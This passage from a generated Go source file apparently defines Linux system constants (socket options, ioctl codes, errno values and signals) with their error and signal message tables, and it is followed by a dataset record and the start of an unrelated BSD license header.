RTM_GETNETCONF = 0x52
RTM_GETNSID = 0x5a
RTM_GETQDISC = 0x26
RTM_GETROUTE = 0x1a
RTM_GETRULE = 0x22
RTM_GETSTATS = 0x5e
RTM_GETTCLASS = 0x2a
RTM_GETTFILTER = 0x2e
RTM_MAX = 0x63
RTM_NEWACTION = 0x30
RTM_NEWADDR = 0x14
RTM_NEWADDRLABEL = 0x48
RTM_NEWCACHEREPORT = 0x60
RTM_NEWLINK = 0x10
RTM_NEWMDB = 0x54
RTM_NEWNDUSEROPT = 0x44
RTM_NEWNEIGH = 0x1c
RTM_NEWNEIGHTBL = 0x40
RTM_NEWNETCONF = 0x50
RTM_NEWNSID = 0x58
RTM_NEWPREFIX = 0x34
RTM_NEWQDISC = 0x24
RTM_NEWROUTE = 0x18
RTM_NEWRULE = 0x20
RTM_NEWSTATS = 0x5c
RTM_NEWTCLASS = 0x28
RTM_NEWTFILTER = 0x2c
RTM_NR_FAMILIES = 0x15
RTM_NR_MSGTYPES = 0x54
RTM_SETDCB = 0x4f
RTM_SETLINK = 0x13
RTM_SETNEIGHTBL = 0x43
RTNH_ALIGNTO = 0x4
RTNH_COMPARE_MASK = 0x19
RTNH_F_DEAD = 0x1
RTNH_F_LINKDOWN = 0x10
RTNH_F_OFFLOAD = 0x8
RTNH_F_ONLINK = 0x4
RTNH_F_PERVASIVE = 0x2
RTNH_F_UNRESOLVED = 0x20
RTN_MAX = 0xb
RTPROT_BABEL = 0x2a
RTPROT_BIRD = 0xc
RTPROT_BOOT = 0x3
RTPROT_DHCP = 0x10
RTPROT_DNROUTED = 0xd
RTPROT_GATED = 0x8
RTPROT_KERNEL = 0x2
RTPROT_MROUTED = 0x11
RTPROT_MRT = 0xa
RTPROT_NTK = 0xf
RTPROT_RA = 0x9
RTPROT_REDIRECT = 0x1
RTPROT_STATIC = 0x4
RTPROT_UNSPEC = 0x0
RTPROT_XORP = 0xe
RTPROT_ZEBRA = 0xb
RT_CLASS_DEFAULT = 0xfd
RT_CLASS_LOCAL = 0xff
RT_CLASS_MAIN = 0xfe
RT_CLASS_MAX = 0xff
RT_CLASS_UNSPEC = 0x0
RUSAGE_CHILDREN = -0x1
RUSAGE_SELF = 0x0
RUSAGE_THREAD = 0x1
SCM_CREDENTIALS = 0x2
SCM_RIGHTS = 0x1
SCM_TIMESTAMP = 0x1d
SCM_TIMESTAMPING = 0x25
SCM_TIMESTAMPING_OPT_STATS = 0x36
SCM_TIMESTAMPING_PKTINFO = 0x3a
SCM_TIMESTAMPNS = 0x23
SCM_WIFI_STATUS = 0x29
SECCOMP_MODE_DISABLED = 0x0
SECCOMP_MODE_FILTER = 0x2
SECCOMP_MODE_STRICT = 0x1
SHUT_RD = 0x0
SHUT_RDWR = 0x2
SHUT_WR = 0x1
SIOCADDDLCI = 0x8980
SIOCADDMULTI = 0x8931
SIOCADDRT = 0x890b
SIOCATMARK = 0x8905
SIOCBONDCHANGEACTIVE = 0x8995
SIOCBONDENSLAVE = 0x8990
SIOCBONDINFOQUERY = 0x8994
SIOCBONDRELEASE = 0x8991
SIOCBONDSETHWADDR = 0x8992
SIOCBONDSLAVEINFOQUERY = 0x8993
SIOCBRADDBR = 0x89a0
SIOCBRADDIF = 0x89a2
SIOCBRDELBR = 0x89a1
SIOCBRDELIF = 0x89a3
SIOCDARP = 0x8953
SIOCDELDLCI = 0x8981
SIOCDELMULTI = 0x8932
SIOCDELRT = 0x890c
SIOCDEVPRIVATE = 0x89f0
SIOCDIFADDR = 0x8936
SIOCDRARP = 0x8960
SIOCETHTOOL = 0x8946
SIOCGARP = 0x8954
SIOCGHWTSTAMP = 0x89b1
SIOCGIFADDR = 0x8915
SIOCGIFBR = 0x8940
SIOCGIFBRDADDR = 0x8919
SIOCGIFCONF = 0x8912
SIOCGIFCOUNT = 0x8938
SIOCGIFDSTADDR = 0x8917
SIOCGIFENCAP = 0x8925
SIOCGIFFLAGS = 0x8913
SIOCGIFHWADDR = 0x8927
SIOCGIFINDEX = 0x8933
SIOCGIFMAP = 0x8970
SIOCGIFMEM = 0x891f
SIOCGIFMETRIC = 0x891d
SIOCGIFMTU = 0x8921
SIOCGIFNAME = 0x8910
SIOCGIFNETMASK = 0x891b
SIOCGIFPFLAGS = 0x8935
SIOCGIFSLAVE = 0x8929
SIOCGIFTXQLEN = 0x8942
SIOCGIFVLAN = 0x8982
SIOCGMIIPHY = 0x8947
SIOCGMIIREG = 0x8948
SIOCGPGRP = 0x8904
SIOCGRARP = 0x8961
SIOCGSKNS = 0x894c
SIOCGSTAMP = 0x8906
SIOCGSTAMPNS = 0x8907
SIOCINQ = 0x541b
SIOCOUTQ = 0x5411
SIOCOUTQNSD = 0x894b
SIOCPROTOPRIVATE = 0x89e0
SIOCRTMSG = 0x890d
SIOCSARP = 0x8955
SIOCSHWTSTAMP = 0x89b0
SIOCSIFADDR = 0x8916
SIOCSIFBR = 0x8941
SIOCSIFBRDADDR = 0x891a
SIOCSIFDSTADDR = 0x8918
SIOCSIFENCAP = 0x8926
SIOCSIFFLAGS = 0x8914
SIOCSIFHWADDR = 0x8924
SIOCSIFHWBROADCAST = 0x8937
SIOCSIFLINK = 0x8911
SIOCSIFMAP = 0x8971
SIOCSIFMEM = 0x8920
SIOCSIFMETRIC = 0x891e
SIOCSIFMTU = 0x8922
SIOCSIFNAME = 0x8923
SIOCSIFNETMASK = 0x891c
SIOCSIFPFLAGS = 0x8934
SIOCSIFSLAVE = 0x8930
SIOCSIFTXQLEN = 0x8943
SIOCSIFVLAN = 0x8983
SIOCSMIIREG = 0x8949
SIOCSPGRP = 0x8902
SIOCSRARP = 0x8962
SIOCWANDEV = 0x894a
SOCK_CLOEXEC = 0x80000
SOCK_DCCP = 0x6
SOCK_DGRAM = 0x2
SOCK_IOC_TYPE = 0x89
SOCK_NONBLOCK = 0x800
SOCK_PACKET = 0xa
SOCK_RAW = 0x3
SOCK_RDM = 0x4
SOCK_SEQPACKET = 0x5
SOCK_STREAM = 0x1
SOL_AAL = 0x109
SOL_ALG = 0x117
SOL_ATM = 0x108
SOL_CAIF = 0x116
SOL_CAN_BASE = 0x64
SOL_DCCP = 0x10d
SOL_DECNET = 0x105
SOL_ICMPV6 = 0x3a
SOL_IP = 0x0
SOL_IPV6 = 0x29
SOL_IRDA = 0x10a
SOL_IUCV = 0x115
SOL_KCM = 0x119
SOL_LLC = 0x10c
SOL_NETBEUI = 0x10b
SOL_NETLINK = 0x10e
SOL_NFC = 0x118
SOL_PACKET = 0x107
SOL_PNPIPE = 0x113
SOL_PPPOL2TP = 0x111
SOL_RAW = 0xff
SOL_RDS = 0x114
SOL_RXRPC = 0x110
SOL_SOCKET = 0x1
SOL_TCP = 0x6
SOL_TIPC = 0x10f
SOL_X25 = 0x106
SOMAXCONN = 0x80
SO_ACCEPTCONN = 0x1e
SO_ATTACH_BPF = 0x32
SO_ATTACH_FILTER = 0x1a
SO_ATTACH_REUSEPORT_CBPF = 0x33
SO_ATTACH_REUSEPORT_EBPF = 0x34
SO_BINDTODEVICE = 0x19
SO_BPF_EXTENSIONS = 0x30
SO_BROADCAST = 0x6
SO_BSDCOMPAT = 0xe
SO_BUSY_POLL = 0x2e
SO_CNX_ADVICE = 0x35
SO_COOKIE = 0x39
SO_DEBUG = 0x1
SO_DETACH_BPF = 0x1b
SO_DETACH_FILTER = 0x1b
SO_DOMAIN = 0x27
SO_DONTROUTE = 0x5
SO_ERROR = 0x4
SO_GET_FILTER = 0x1a
SO_INCOMING_CPU = 0x31
SO_INCOMING_NAPI_ID = 0x38
SO_KEEPALIVE = 0x9
SO_LINGER = 0xd
SO_LOCK_FILTER = 0x2c
SO_MARK = 0x24
SO_MAX_PACING_RATE = 0x2f
SO_MEMINFO = 0x37
SO_NOFCS = 0x2b
SO_NO_CHECK = 0xb
SO_OOBINLINE = 0xa
SO_PASSCRED = 0x10
SO_PASSSEC = 0x22
SO_PEEK_OFF = 0x2a
SO_PEERCRED = 0x11
SO_PEERGROUPS = 0x3b
SO_PEERNAME = 0x1c
SO_PEERSEC = 0x1f
SO_PRIORITY = 0xc
SO_PROTOCOL = 0x26
SO_RCVBUF = 0x8
SO_RCVBUFFORCE = 0x21
SO_RCVLOWAT = 0x12
SO_RCVTIMEO = 0x14
SO_REUSEADDR = 0x2
SO_REUSEPORT = 0xf
SO_RXQ_OVFL = 0x28
SO_SECURITY_AUTHENTICATION = 0x16
SO_SECURITY_ENCRYPTION_NETWORK = 0x18
SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17
SO_SELECT_ERR_QUEUE = 0x2d
SO_SNDBUF = 0x7
SO_SNDBUFFORCE = 0x20
SO_SNDLOWAT = 0x13
SO_SNDTIMEO = 0x15
SO_TIMESTAMP = 0x1d
SO_TIMESTAMPING = 0x25
SO_TIMESTAMPNS = 0x23
SO_TYPE = 0x3
SO_VM_SOCKETS_BUFFER_MAX_SIZE = 0x2
SO_VM_SOCKETS_BUFFER_MIN_SIZE = 0x1
SO_VM_SOCKETS_BUFFER_SIZE = 0x0
SO_VM_SOCKETS_CONNECT_TIMEOUT = 0x6
SO_VM_SOCKETS_NONBLOCK_TXRX = 0x7
SO_VM_SOCKETS_PEER_HOST_VM_ID = 0x3
SO_VM_SOCKETS_TRUSTED = 0x5
SO_WIFI_STATUS = 0x29
SPLICE_F_GIFT = 0x8
SPLICE_F_MORE = 0x4
SPLICE_F_MOVE = 0x1
SPLICE_F_NONBLOCK = 0x2
S_BLKSIZE = 0x200
S_IEXEC = 0x40
S_IFBLK = 0x6000
S_IFCHR = 0x2000
S_IFDIR = 0x4000
S_IFIFO = 0x1000
S_IFLNK = 0xa000
S_IFMT = 0xf000
S_IFREG = 0x8000
S_IFSOCK = 0xc000
S_IREAD = 0x100
S_IRGRP = 0x20
S_IROTH = 0x4
S_IRUSR = 0x100
S_IRWXG = 0x38
S_IRWXO = 0x7
S_IRWXU = 0x1c0
S_ISGID = 0x400
S_ISUID = 0x800
S_ISVTX = 0x200
S_IWGRP = 0x10
S_IWOTH = 0x2
S_IWRITE = 0x80
S_IWUSR = 0x80
S_IXGRP = 0x8
S_IXOTH = 0x1
S_IXUSR = 0x40
TAB0 = 0x0
TAB1 = 0x800
TAB2 = 0x1000
TAB3 = 0x1800
TABDLY = 0x1800
TASKSTATS_CMD_ATTR_MAX = 0x4
TASKSTATS_CMD_MAX = 0x2
TASKSTATS_GENL_NAME = "TASKSTATS"
TASKSTATS_GENL_VERSION = 0x1
TASKSTATS_TYPE_MAX = 0x6
TASKSTATS_VERSION = 0x8
TCFLSH = 0x540b
TCGETA = 0x5405
TCGETS = 0x5401
TCGETS2 = 0x802c542a
TCGETX = 0x5432
TCIFLUSH = 0x0
TCIOFF = 0x2
TCIOFLUSH = 0x2
TCION = 0x3
TCOFLUSH = 0x1
TCOOFF = 0x0
TCOON = 0x1
TCP_CC_INFO = 0x1a
TCP_CONGESTION = 0xd
TCP_COOKIE_IN_ALWAYS = 0x1
TCP_COOKIE_MAX = 0x10
TCP_COOKIE_MIN = 0x8
TCP_COOKIE_OUT_NEVER = 0x2
TCP_COOKIE_PAIR_SIZE = 0x20
TCP_COOKIE_TRANSACTIONS = 0xf
TCP_CORK = 0x3
TCP_DEFER_ACCEPT = 0x9
TCP_FASTOPEN = 0x17
TCP_FASTOPEN_CONNECT = 0x1e
TCP_INFO = 0xb
TCP_KEEPCNT = 0x6
TCP_KEEPIDLE = 0x4
TCP_KEEPINTVL = 0x5
TCP_LINGER2 = 0x8
TCP_MAXSEG = 0x2
TCP_MAXWIN = 0xffff
TCP_MAX_WINSHIFT = 0xe
TCP_MD5SIG = 0xe
TCP_MD5SIG_MAXKEYLEN = 0x50
TCP_MSS = 0x200
TCP_MSS_DEFAULT = 0x218
TCP_MSS_DESIRED = 0x4c4
TCP_NODELAY = 0x1
TCP_NOTSENT_LOWAT = 0x19
TCP_QUEUE_SEQ = 0x15
TCP_QUICKACK = 0xc
TCP_REPAIR = 0x13
TCP_REPAIR_OPTIONS = 0x16
TCP_REPAIR_QUEUE = 0x14
TCP_REPAIR_WINDOW = 0x1d
TCP_SAVED_SYN = 0x1c
TCP_SAVE_SYN = 0x1b
TCP_SYNCNT = 0x7
TCP_S_DATA_IN = 0x4
TCP_S_DATA_OUT = 0x8
TCP_THIN_DUPACK = 0x11
TCP_THIN_LINEAR_TIMEOUTS = 0x10
TCP_TIMESTAMP = 0x18
TCP_USER_TIMEOUT = 0x12
TCP_WINDOW_CLAMP = 0xa
TCSAFLUSH = 0x2
TCSBRK = 0x5409
TCSBRKP = 0x5425
TCSETA = 0x5406
TCSETAF = 0x5408
TCSETAW = 0x5407
TCSETS = 0x5402
TCSETS2 = 0x402c542b
TCSETSF = 0x5404
TCSETSF2 = 0x402c542d
TCSETSW = 0x5403
TCSETSW2 = 0x402c542c
TCSETX = 0x5433
TCSETXF = 0x5434
TCSETXW = 0x5435
TCXONC = 0x540a
TIOCCBRK = 0x5428
TIOCCONS = 0x541d
TIOCEXCL = 0x540c
TIOCGDEV = 0x80045432
TIOCGETD = 0x5424
TIOCGEXCL = 0x80045440
TIOCGICOUNT = 0x545d
TIOCGLCKTRMIOS = 0x5456
TIOCGPGRP = 0x540f
TIOCGPKT = 0x80045438
TIOCGPTLCK = 0x80045439
TIOCGPTN = 0x80045430
TIOCGPTPEER = 0x5441
TIOCGRS485 = 0x542e
TIOCGSERIAL = 0x541e
TIOCGSID = 0x5429
TIOCGSOFTCAR = 0x5419
TIOCGWINSZ = 0x5413
TIOCINQ = 0x541b
TIOCLINUX = 0x541c
TIOCMBIC = 0x5417
TIOCMBIS = 0x5416
TIOCMGET = 0x5415
TIOCMIWAIT = 0x545c
TIOCMSET = 0x5418
TIOCM_CAR = 0x40
TIOCM_CD = 0x40
TIOCM_CTS = 0x20
TIOCM_DSR = 0x100
TIOCM_DTR = 0x2
TIOCM_LE = 0x1
TIOCM_RI = 0x80
TIOCM_RNG = 0x80
TIOCM_RTS = 0x4
TIOCM_SR = 0x10
TIOCM_ST = 0x8
TIOCNOTTY = 0x5422
TIOCNXCL = 0x540d
TIOCOUTQ = 0x5411
TIOCPKT = 0x5420
TIOCPKT_DATA = 0x0
TIOCPKT_DOSTOP = 0x20
TIOCPKT_FLUSHREAD = 0x1
TIOCPKT_FLUSHWRITE = 0x2
TIOCPKT_IOCTL = 0x40
TIOCPKT_NOSTOP = 0x10
TIOCPKT_START = 0x8
TIOCPKT_STOP = 0x4
TIOCSBRK = 0x5427
TIOCSCTTY = 0x540e
TIOCSERCONFIG = 0x5453
TIOCSERGETLSR = 0x5459
TIOCSERGETMULTI = 0x545a
TIOCSERGSTRUCT = 0x5458
TIOCSERGWILD = 0x5454
TIOCSERSETMULTI = 0x545b
TIOCSERSWILD = 0x5455
TIOCSER_TEMT = 0x1
TIOCSETD = 0x5423
TIOCSIG = 0x40045436
TIOCSLCKTRMIOS = 0x5457
TIOCSPGRP = 0x5410
TIOCSPTLCK = 0x40045431
TIOCSRS485 = 0x542f
TIOCSSERIAL = 0x541f
TIOCSSOFTCAR = 0x541a
TIOCSTI = 0x5412
TIOCSWINSZ = 0x5414
TIOCVHANGUP = 0x5437
TOSTOP = 0x100
TS_COMM_LEN = 0x20
TUNATTACHFILTER = 0x401054d5
TUNDETACHFILTER = 0x401054d6
TUNGETFEATURES = 0x800454cf
TUNGETFILTER = 0x801054db
TUNGETIFF = 0x800454d2
TUNGETSNDBUF = 0x800454d3
TUNGETVNETBE = 0x800454df
TUNGETVNETHDRSZ = 0x800454d7
TUNGETVNETLE = 0x800454dd
TUNSETDEBUG = 0x400454c9
TUNSETGROUP = 0x400454ce
TUNSETIFF = 0x400454ca
TUNSETIFINDEX = 0x400454da
TUNSETLINK = 0x400454cd
TUNSETNOCSUM = 0x400454c8
TUNSETOFFLOAD = 0x400454d0
TUNSETOWNER = 0x400454cc
TUNSETPERSIST = 0x400454cb
TUNSETQUEUE = 0x400454d9
TUNSETSNDBUF = 0x400454d4
TUNSETTXFILTER = 0x400454d1
TUNSETVNETBE = 0x400454de
TUNSETVNETHDRSZ = 0x400454d8
TUNSETVNETLE = 0x400454dc
UMOUNT_NOFOLLOW = 0x8
UTIME_NOW = 0x3fffffff
UTIME_OMIT = 0x3ffffffe
VDISCARD = 0xd
VEOF = 0x4
VEOL = 0xb
VEOL2 = 0x10
VERASE = 0x2
VINTR = 0x0
VKILL = 0x3
VLNEXT = 0xf
VMADDR_CID_ANY = 0xffffffff
VMADDR_CID_HOST = 0x2
VMADDR_CID_HYPERVISOR = 0x0
VMADDR_CID_RESERVED = 0x1
VMADDR_PORT_ANY = 0xffffffff
VMIN = 0x6
VM_SOCKETS_INVALID_VERSION = 0xffffffff
VQUIT = 0x1
VREPRINT = 0xc
VSTART = 0x8
VSTOP = 0x9
VSUSP = 0xa
VSWTC = 0x7
VT0 = 0x0
VT1 = 0x4000
VTDLY = 0x4000
VTIME = 0x5
VWERASE = 0xe
WALL = 0x40000000
WCLONE = 0x80000000
WCONTINUED = 0x8
WDIOC_GETBOOTSTATUS = 0x80045702
WDIOC_GETPRETIMEOUT = 0x80045709
WDIOC_GETSTATUS = 0x80045701
WDIOC_GETSUPPORT = 0x80285700
WDIOC_GETTEMP = 0x80045703
WDIOC_GETTIMELEFT = 0x8004570a
WDIOC_GETTIMEOUT = 0x80045707
WDIOC_KEEPALIVE = 0x80045705
WDIOC_SETOPTIONS = 0x80045704
WDIOC_SETPRETIMEOUT = 0xc0045708
WDIOC_SETTIMEOUT = 0xc0045706
WEXITED = 0x4
WNOHANG = 0x1
WNOTHREAD = 0x20000000
WNOWAIT = 0x1000000
WORDSIZE = 0x40
WSTOPPED = 0x2
WUNTRACED = 0x2
XATTR_CREATE = 0x1
XATTR_REPLACE = 0x2
XCASE = 0x4
XTABS = 0x1800
)
// Errors
const (
E2BIG = syscall.Errno(0x7)
EACCES = syscall.Errno(0xd)
EADDRINUSE = syscall.Errno(0x62)
EADDRNOTAVAIL = syscall.Errno(0x63)
EADV = syscall.Errno(0x44)
EAFNOSUPPORT = syscall.Errno(0x61)
EAGAIN = syscall.Errno(0xb)
EALREADY = syscall.Errno(0x72)
EBADE = syscall.Errno(0x34)
EBADF = syscall.Errno(0x9)
EBADFD = syscall.Errno(0x4d)
EBADMSG = syscall.Errno(0x4a)
EBADR = syscall.Errno(0x35)
EBADRQC = syscall.Errno(0x38)
EBADSLT = syscall.Errno(0x39)
EBFONT = syscall.Errno(0x3b)
EBUSY = syscall.Errno(0x10)
ECANCELED = syscall.Errno(0x7d)
ECHILD = syscall.Errno(0xa)
ECHRNG = syscall.Errno(0x2c)
ECOMM = syscall.Errno(0x46)
ECONNABORTED = syscall.Errno(0x67)
ECONNREFUSED = syscall.Errno(0x6f)
ECONNRESET = syscall.Errno(0x68)
EDEADLK = syscall.Errno(0x23)
EDEADLOCK = syscall.Errno(0x23)
EDESTADDRREQ = syscall.Errno(0x59)
EDOM = syscall.Errno(0x21)
EDOTDOT = syscall.Errno(0x49)
EDQUOT = syscall.Errno(0x7a)
EEXIST = syscall.Errno(0x11)
EFAULT = syscall.Errno(0xe)
EFBIG = syscall.Errno(0x1b)
EHOSTDOWN = syscall.Errno(0x70)
EHOSTUNREACH = syscall.Errno(0x71)
EHWPOISON = syscall.Errno(0x85)
EIDRM = syscall.Errno(0x2b)
EILSEQ = syscall.Errno(0x54)
EINPROGRESS = syscall.Errno(0x73)
EINTR = syscall.Errno(0x4)
EINVAL = syscall.Errno(0x16)
EIO = syscall.Errno(0x5)
EISCONN = syscall.Errno(0x6a)
EISDIR = syscall.Errno(0x15)
EISNAM = syscall.Errno(0x78)
EKEYEXPIRED = syscall.Errno(0x7f)
EKEYREJECTED = syscall.Errno(0x81)
EKEYREVOKED = syscall.Errno(0x80)
EL2HLT = syscall.Errno(0x33)
EL2NSYNC = syscall.Errno(0x2d)
EL3HLT = syscall.Errno(0x2e)
EL3RST = syscall.Errno(0x2f)
ELIBACC = syscall.Errno(0x4f)
ELIBBAD = syscall.Errno(0x50)
ELIBEXEC = syscall.Errno(0x53)
ELIBMAX = syscall.Errno(0x52)
ELIBSCN = syscall.Errno(0x51)
ELNRNG = syscall.Errno(0x30)
ELOOP = syscall.Errno(0x28)
EMEDIUMTYPE = syscall.Errno(0x7c)
EMFILE = syscall.Errno(0x18)
EMLINK = syscall.Errno(0x1f)
EMSGSIZE = syscall.Errno(0x5a)
EMULTIHOP = syscall.Errno(0x48)
ENAMETOOLONG = syscall.Errno(0x24)
ENAVAIL = syscall.Errno(0x77)
ENETDOWN = syscall.Errno(0x64)
ENETRESET = syscall.Errno(0x66)
ENETUNREACH = syscall.Errno(0x65)
ENFILE = syscall.Errno(0x17)
ENOANO = syscall.Errno(0x37)
ENOBUFS = syscall.Errno(0x69)
ENOCSI = syscall.Errno(0x32)
ENODATA = syscall.Errno(0x3d)
ENODEV = syscall.Errno(0x13)
ENOENT = syscall.Errno(0x2)
ENOEXEC = syscall.Errno(0x8)
ENOKEY = syscall.Errno(0x7e)
ENOLCK = syscall.Errno(0x25)
ENOLINK = syscall.Errno(0x43)
ENOMEDIUM = syscall.Errno(0x7b)
ENOMEM = syscall.Errno(0xc)
ENOMSG = syscall.Errno(0x2a)
ENONET = syscall.Errno(0x40)
ENOPKG = syscall.Errno(0x41)
ENOPROTOOPT = syscall.Errno(0x5c)
ENOSPC = syscall.Errno(0x1c)
ENOSR = syscall.Errno(0x3f)
ENOSTR = syscall.Errno(0x3c)
ENOSYS = syscall.Errno(0x26)
ENOTBLK = syscall.Errno(0xf)
ENOTCONN = syscall.Errno(0x6b)
ENOTDIR = syscall.Errno(0x14)
ENOTEMPTY = syscall.Errno(0x27)
ENOTNAM = syscall.Errno(0x76)
ENOTRECOVERABLE = syscall.Errno(0x83)
ENOTSOCK = syscall.Errno(0x58)
ENOTSUP = syscall.Errno(0x5f)
ENOTTY = syscall.Errno(0x19)
ENOTUNIQ = syscall.Errno(0x4c)
ENXIO = syscall.Errno(0x6)
EOPNOTSUPP = syscall.Errno(0x5f)
EOVERFLOW = syscall.Errno(0x4b)
EOWNERDEAD = syscall.Errno(0x82)
EPERM = syscall.Errno(0x1)
EPFNOSUPPORT = syscall.Errno(0x60)
EPIPE = syscall.Errno(0x20)
EPROTO = syscall.Errno(0x47)
EPROTONOSUPPORT = syscall.Errno(0x5d)
EPROTOTYPE = syscall.Errno(0x5b)
ERANGE = syscall.Errno(0x22)
EREMCHG = syscall.Errno(0x4e)
EREMOTE = syscall.Errno(0x42)
EREMOTEIO = syscall.Errno(0x79)
ERESTART = syscall.Errno(0x55)
ERFKILL = syscall.Errno(0x84)
EROFS = syscall.Errno(0x1e)
ESHUTDOWN = syscall.Errno(0x6c)
ESOCKTNOSUPPORT = syscall.Errno(0x5e)
ESPIPE = syscall.Errno(0x1d)
ESRCH = syscall.Errno(0x3)
ESRMNT = syscall.Errno(0x45)
ESTALE = syscall.Errno(0x74)
ESTRPIPE = syscall.Errno(0x56)
ETIME = syscall.Errno(0x3e)
ETIMEDOUT = syscall.Errno(0x6e)
ETOOMANYREFS = syscall.Errno(0x6d)
ETXTBSY = syscall.Errno(0x1a)
EUCLEAN = syscall.Errno(0x75)
EUNATCH = syscall.Errno(0x31)
EUSERS = syscall.Errno(0x57)
EWOULDBLOCK = syscall.Errno(0xb)
EXDEV = syscall.Errno(0x12)
EXFULL = syscall.Errno(0x36)
)
// Signals
const (
SIGABRT = syscall.Signal(0x6)
SIGALRM = syscall.Signal(0xe)
SIGBUS = syscall.Signal(0x7)
SIGCHLD = syscall.Signal(0x11)
SIGCLD = syscall.Signal(0x11)
SIGCONT = syscall.Signal(0x12)
SIGFPE = syscall.Signal(0x8)
SIGHUP = syscall.Signal(0x1)
SIGILL = syscall.Signal(0x4)
SIGINT = syscall.Signal(0x2)
SIGIO = syscall.Signal(0x1d)
SIGIOT = syscall.Signal(0x6)
SIGKILL = syscall.Signal(0x9)
SIGPIPE = syscall.Signal(0xd)
SIGPOLL = syscall.Signal(0x1d)
SIGPROF = syscall.Signal(0x1b)
SIGPWR = syscall.Signal(0x1e)
SIGQUIT = syscall.Signal(0x3)
SIGSEGV = syscall.Signal(0xb)
SIGSTKFLT = syscall.Signal(0x10)
SIGSTOP = syscall.Signal(0x13)
SIGSYS = syscall.Signal(0x1f)
SIGTERM = syscall.Signal(0xf)
SIGTRAP = syscall.Signal(0x5)
SIGTSTP = syscall.Signal(0x14)
SIGTTIN = syscall.Signal(0x15)
SIGTTOU = syscall.Signal(0x16)
SIGURG = syscall.Signal(0x17)
SIGUSR1 = syscall.Signal(0xa)
SIGUSR2 = syscall.Signal(0xc)
SIGVTALRM = syscall.Signal(0x1a)
SIGWINCH = syscall.Signal(0x1c)
SIGXCPU = syscall.Signal(0x18)
SIGXFSZ = syscall.Signal(0x19)
)
// Error table
var errors = [...]string{
1: "operation not permitted",
2: "no such file or directory",
3: "no such process",
4: "interrupted system call",
5: "input/output error",
6: "no such device or address",
7: "argument list too long",
8: "exec format error",
9: "bad file descriptor",
10: "no child processes",
11: "resource temporarily unavailable",
12: "cannot allocate memory",
13: "permission denied",
14: "bad address",
15: "block device required",
16: "device or resource busy",
17: "file exists",
18: "invalid cross-device link",
19: "no such device",
20: "not a directory",
21: "is a directory",
22: "invalid argument",
23: "too many open files in system",
24: "too many open files",
25: "inappropriate ioctl for device",
26: "text file busy",
27: "file too large",
28: "no space left on device",
29: "illegal seek",
30: "read-only file system",
31: "too many links",
32: "broken pipe",
33: "numerical argument out of domain",
34: "numerical result out of range",
35: "resource deadlock avoided",
36: "file name too long",
37: "no locks available",
38: "function not implemented",
39: "directory not empty",
40: "too many levels of symbolic links",
42: "no message of desired type",
43: "identifier removed",
44: "channel number out of range",
45: "level 2 not synchronized",
46: "level 3 halted",
47: "level 3 reset",
48: "link number out of range",
49: "protocol driver not attached",
50: "no CSI structure available",
51: "level 2 halted",
52: "invalid exchange",
53: "invalid request descriptor",
54: "exchange full",
55: "no anode",
56: "invalid request code",
57: "invalid slot",
59: "bad font file format",
60: "device not a stream",
61: "no data available",
62: "timer expired",
63: "out of streams resources",
64: "machine is not on the network",
65: "package not installed",
66: "object is remote",
67: "link has been severed",
68: "advertise error",
69: "srmount error",
70: "communication error on send",
71: "protocol error",
72: "multihop attempted",
73: "RFS specific error",
74: "bad message",
75: "value too large for defined data type",
76: "name not unique on network",
77: "file descriptor in bad state",
78: "remote address changed",
79: "can not access a needed shared library",
80: "accessing a corrupted shared library",
81: ".lib section in a.out corrupted",
82: "attempting to link in too many shared libraries",
83: "cannot exec a shared library directly",
84: "invalid or incomplete multibyte or wide character",
85: "interrupted system call should be restarted",
86: "streams pipe error",
87: "too many users",
88: "socket operation on non-socket",
89: "destination address required",
90: "message too long",
91: "protocol wrong type for socket",
92: "protocol not available",
93: "protocol not supported",
94: "socket type not supported",
95: "operation not supported",
96: "protocol family not supported",
97: "address family not supported by protocol",
98: "address already in use",
99: "cannot assign requested address",
100: "network is down",
101: "network is unreachable",
102: "network dropped connection on reset",
103: "software caused connection abort",
104: "connection reset by peer",
105: "no buffer space available",
106: "transport endpoint is already connected",
107: "transport endpoint is not connected",
108: "cannot send after transport endpoint shutdown",
109: "too many references: cannot splice",
110: "connection timed out",
111: "connection refused",
112: "host is down",
113: "no route to host",
114: "operation already in progress",
115: "operation now in progress",
116: "stale file handle",
117: "structure needs cleaning",
118: "not a XENIX named type file",
119: "no XENIX semaphores available",
120: "is a named type file",
121: "remote I/O error",
122: "disk quota exceeded",
123: "no medium found",
124: "wrong medium type",
125: "operation canceled",
126: "required key not available",
127: "key has expired",
128: "key has been revoked",
129: "key was rejected by service",
130: "owner died",
131: "state not recoverable",
132: "operation not possible due to RF-kill",
133: "memory page has hardware error",
}
// Signal table
var signals = [...]string{
1: "hangup",
2: "interrupt",
3: "quit",
4: "illegal instruction",
5: "trace/breakpoint trap",
6: "aborted",
7: "bus error",
8: "floating point exception",
9: "killed",
10: "user defined signal 1",
11: "segmentation fault",
12: "user defined signal 2",
13: "broken pipe",
14: "alarm clock",
15: "terminated",
16: "stack fault",
17: "child exited",
18: "continued",
19: "stopped (signal)",
20: "stopped",
21: "stopped (tty input)",
22: "stopped (tty output)",
23: "urgent I/O condition",
24: "CPU time limit exceeded",
25: "file size limit exceeded",
26: "virtual timer expired",
27: "profiling timer expired",
28: "window changed",
29: "I/O possible",
30: "power failure",
31: "bad system call",
}
| {
"pile_set_name": "Github"
} |
// Copyright 2005 Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
